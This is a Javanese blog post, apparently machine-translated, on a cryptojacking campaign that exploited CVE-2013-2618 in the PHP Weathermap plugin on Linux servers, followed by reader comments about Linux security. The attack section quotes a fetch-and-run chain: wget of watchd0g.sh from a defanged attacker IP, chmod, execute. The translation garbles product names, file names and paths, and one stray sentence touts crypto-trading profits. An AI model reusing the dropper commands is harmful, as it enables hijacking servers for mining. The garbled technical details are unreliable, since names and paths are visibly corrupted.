Iki saka penambang cryptocurrency kanthi nggunakake komputer remot tanpa wewenang saka pihak sing duwe iki dadi tren. Aku wis ngobrol babagan iki ing sawetara acara ing blog babagan jinis kahanan iki.
Lan iki wis ora bisa dikendhaleni wiwit saiki cryptocurrency wis njupuk papan lan nilai sing cukup, wong sing duwe cukup ilmu kanggo ngakses komputer sing nglanggar keamanan dheweke nyisihake wektu kanggo golek informasi penting utawa akun bank kanggo entuk bathi moneter.
Tinimbang nindakake iki, dheweke milih sing paling gampang kanggo ngontrol tim kasebut lan nyawijine ing jaringan penambangan lan uga tugas liyane sing umume ditindakake karo botnet.
Kanthi cara iki biasane luwih akeh maneh jeneng sampeyan, dheweke mung fokus ing dhuwit instan sing ngasilake iki.
Kanthi pangerten babagan tren pasar lan ilmu babagan dagang crypto sing tepat, bisa entuk mupangat sing gedhe.
Apa Linux pancen sistem sing aman?
Akeh wong sing duwe ide manawa Linux minangka sistem operasi aman sing meh sampurna, kasunyatane isih duwe kekurangan.
Wissawetara dina TrendMicro nemokake, sing dicethakaké anyar cacat sistem Linux sing menehi hacker kauntungan saka cryptocurrency penambangan nggunakake server lan mesin Linux.
Ing pratelan liwat blog sampeyan padha komentar ing ngisor iki:
Liwat pemantauan sing ana gandhengane karo tanggepan insiden, kita nemokake upaya intrusi sing indikator kasebut bisa cocog karo kampanye penambangan cryptocurrency sadurunge sing nggunakake malware JenkinsMiner.
Bedane: kampanye iki target server Linux. Iki uga minangka kasus klasik kerentanan sing digunakake maneh, ngeksploitasi cacat keamanan sing wis ketinggalan jaman sing tembelan wis kasedhiya meh limang taun.
Ing rilis iki liwat analisis sampeyan ngatur kanggo ngenali situs sing kena pengaruh kanggo kegagalan iki sing Utamane mengaruhi Jepang, Taiwan, China, USA lan India.
Analisis serangan
Liwat analisis dening Trend Micro Smart Protection Network rinci babagan carane panyerang njupuk kauntungan saka cacat iki:
Operator kampanye iki ngeksploitasi CVE-2013-2618, kerentanan tanggal plugin Camapi Network Weathermap, sing digunakake administrator sistem kanggo nggambarake kegiatan jaringan.
Ngapa dheweke ngeksploitasi cacat keamanan lawas: Weathermap Network mung duwe rong kerentanan sing dilaporake ing masarakat, wiwit wulan Juni 2014.
Penyerang iki bisa uga njupuk kauntungan ora mung saka cacat keamanan sing kasedhiya eksploitasi nanging uga wektu tundha tambalan sing kedadeyan ing organisasi sing nggunakake alat open source.
Pokokna serangan kasebut liwat serangan XSS:
Sisih sing kabur yaiku target serangan, server web kanthi port.
Berkas /plugins/weathermap/configs/conn.php yaiku file sing nyebabake serangan XSS sing terus-terusan / plugins / weathermap / php .
Saliyane sambung Wiwitane, kita ndeleng panjaluk HTTP sing padha karo kaca sing diarani ' adhem.php '.
Program penambangan cryptocurrency disebar liwat kerentanan saka peta cuaca PHP ing target sing dadi server Linux
Ing gambar sampeyan bisa ndeleng cara serangan kasebut lan diterangake kaya ing ngisor iki:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
Apa sing ditindakake yaiku ngirim pratondo kanggo ndownload file kanthi wget, yaiku utilitas sing meh kabeh distribusi Linux wis diinstal kanthi standar.
chmod 775 watchd0g.sh
nggawe file bisa dieksekusi
./watchd0g.sh
Apa sing pungkasane nggawe file mbukak ing server.
Begjanipun, wis ana tambalan ( CVE-2013-2618 ) kasedhiya kanggo Gagal lan Sampeyan bisa ndownload saka link iki
Si sampeyan pengin ngerti luwih lengkap babagan iki Gagal iki sampeyan bisa ngunjungi link iki.
sumber: Penambang Cryptocurrency Disebar liwat PHP Weathermap Vulnerability, Target Target Server Linux
5 komentar, tinggalake sampeyan
Dadi wong bodho ora aman, lan sanajan Linux ngirit sampeyan.
Ora kesalahan nganyari patches keamanan minangka kesalahan Linux. Ana kesalahan yen sawetara perusahaan, ngirit dhuwit, nyewa wong bodho dadi administrator sistem,
Nanging sanajan mangkono, DETEKTIF LANGSUNG lan ditanggulangi langsung, sanajan kedadeyan keamanan cilik kaya iki diterbitake.
Lan apa kesalahan Linux yen nganyari ora ditrapake? Pangembang GNU / Linux nindakake tugas kanthi ngembangake solusi kerentanan sing muncul lan kasedhiya kanggo pangguna. Yen dhokter menehi resep vaksin flu lan ora entuk, sampeyan lara lan kaku ... apa dhokter salah?
Amarga Linux dudu, ana rong warta kanthi rong gangguan utama:
1.- Kanggo editor sing luwih apik kanggo ngembangake, sijine piranti lunak sing dudu piranti lunak gratis lan lali karo wong liya (dikutip komentar).
2.- Warta sing luar biasa babagan virus nalika mung mengaruhi server NON UPDATED. Nanging yen ana linux sing diupdate sacara default wis puluhan taun. Kanggo nyedhiyakake rasa wedi kaya antivirus sing nyedhot gaya Windows. Dheweke kayane nyoba ujar manawa Linux padha karo Windows lan ora.
Yen bug wis lawas lan wis ditambal, iku ora warta utawa ora ana apa-apa. Aja main karo perusahaan Microsoft lan antivirus kayata Trend Micro, Norton, Panda utawa McAffee, utawa entuk bayaran.
Mangkene, kita nggunakake Trend Micro sajrone pirang-pirang taun ing perusahaan kasebut lan kentang nyata, amarga sistem kasebut ujar manawa eksekusi bisa "nglacak" virus (bisa uga virus, sanajan ora) lan kenapa iku mbusak (njupuk menyang direktori supaya ora mbukak) ora ngidini panggunaan, lan ora duwe dhaptar putih kanggo mbukak blokir tumindak iki kanthi file eksekusi aman sing kudu digunakake. Ayo telek. Iki versi perusahaan, versi individu duwe kemungkinan dhaptar putih iki. Nuwun sanget.
Aja nggambarake awakmu kanthi elegan banget.
Artikel kasebut nyritakake babagan bolongan keamanan sing ngidini ngenalake program, supaya bisa dieksekusi lan dieksekusi, yaiku lubang keamanan sing kudu disebar saben virus. pindai komputer ing jaringan kanggo mbaleni operasi lan salinan otomatis. Dheweke ora nindakake kanthi bener amarga ing Linux, bolongan keamanan sing ditemokake ditutupi tambalan keamanan, lan tegese tegese beda antarane Windows lan Linux, amarga antivirus ora perlu, nanging kanggo nutupi bolongan kasebut. Ing Windows, luwih angel amarga sawetara sebab: 1.- File kasebut bisa dieksekusi mung kanthi ekstensi, ngilangi langkah kanggo ngenalake ing komputer sing kena pengaruh. 2.- Pangguna terus-terusan nginstal program asal-usul sing mangu-mangu amarga duweke lan kudu duwe tanpa mbayar (Aku ora ngandhani apa sing bakal ditindakake kanggo ekonomi omah kanggo tuku MS Office, Photoshop, ... luwih saka tikel biaya peralatan komputer). 3.- Cepet utawa mengko Windows bakal disebar, pangguna njupuk menyang tangga teparo, kanca, ... sing, supaya ora mbuang-mbuwang wektu, format kabeh lan nginstal Windows kanthi patch aktif sing ora dianyari utawa tambalan kasebut nempatno program ndelok. Bisa uga ora lan apik banget, nanging bisa uga ndelok sandhi ing Windows. Ing artikel kasebut, dheweke nyebutake sistem introduksi ing linux sing kena kerentanan, nggawe program sing otomatis mindai jaringan lan nggunakake salinan kanggo awake dhewe lan mbukak ing server minangka bagean sing paling gampang saka kabeh perkara kasebut, amarga alasan kasebut ing artikel kasebut minangka langkah sing paling penting kanggo virus: ngerti kerentanan sistem kanggo nyerang.
Informasi sing ora apik. Iki dudu bug ing Linux, nanging bug ing APLIKASI PHP, yaiku lintas platform. Malah ora eksklusif kanggo sistem sing mbukak kernel linux! Nanging sanajan aplikasi kasebut dudu salib-platform, iki ora bakal dadi bug Linux, iku bakal mung aplikasi.
Kernel Linux ora duwe gangguan apa-apa kanggo nglindhungi serangan skrip lintas situs kaya iki. Paling ora, selidiki LIMA MINIT sadurunge diposting amarga kasunyatane, sapa wae sing ngerti sethithik babagan prekara, sampeyan bakal katon ala.